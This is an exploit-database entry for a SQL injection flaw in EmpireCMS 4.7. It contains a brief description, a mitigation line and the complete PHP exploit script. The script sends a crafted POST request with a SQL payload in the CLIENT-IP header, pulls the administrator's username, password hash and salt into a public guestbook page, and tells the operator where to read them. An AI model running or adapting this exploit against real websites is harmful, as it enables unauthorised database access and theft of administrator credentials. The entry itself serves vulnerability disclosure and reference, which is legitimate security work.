header-logo
Suggest Exploit
vendor:
EmpireCMS47
by:
Securitylab.ir
6.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: EmpireCMS47
Affected Version From: EmpireCMS47
Affected Version To: EmpireCMS47
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP >= 5 & MySQL >= 4.1
2008

EmpireCMS47 SQL Injection Vulnerability

EmpireCMS47 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'name', 'email', 'call', 'lytext' and 'enews' parameters of the 'index.php' script. An attacker can send a specially crafted HTTP request with malicious SQL statements to the vulnerable script and execute arbitrary SQL commands in application's database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.
Source

Exploit-DB raw data:

<?php
print_r("
+------------------------------------------------------------------+
Application Info:
Name: EmpireCMS47
--------------------------------------------
Discoverd By: Securitylab.ir
Contacts: info@securitylab[dot]ir
Note: just work as php>=5&mysql>=4.1
--------------------------------------------
Vulnerability Info:
Sql Injection
Medium Risk
+------------------------------------------------------------------+
");
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path \n";
echo "host: target server \n";
echo "path: path to EmpireCMS47\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /\n";
die;
}
$host=$argv[1];
$path=$argv[2];
$data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook";
$cmd = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where 
userid=1),'',1,'1111',0,0,'')/*";
$message = "POST ".$path."/e/enews/index.php"." HTTP/1.1\r\n";
$message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "CLIENT-IP: $cmd\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($data)."\r\n";
$message .= "Cookie: ecmsgbookbid=1;\r\n";
$message .= "Connection: Close\r\n";
$message .= "\r\n";
$message .=$data;
$ock=fsockopen($host,80);
if (!$ock) {
echo 'No response from '.$host;
die;
}
echo "[+]connected to the site!\r\n";
echo "[+]sending data now……\r\n";
fputs($ock,$message);
@$resp ='';
while ($ock && !feof($ock))
$resp .= fread($ock, 1024);
echo $resp;
echo "[+]done!\r\n";
echo "[+]go to http://$host$path/e/tool/gbook/?bid=1 see the hash"
?>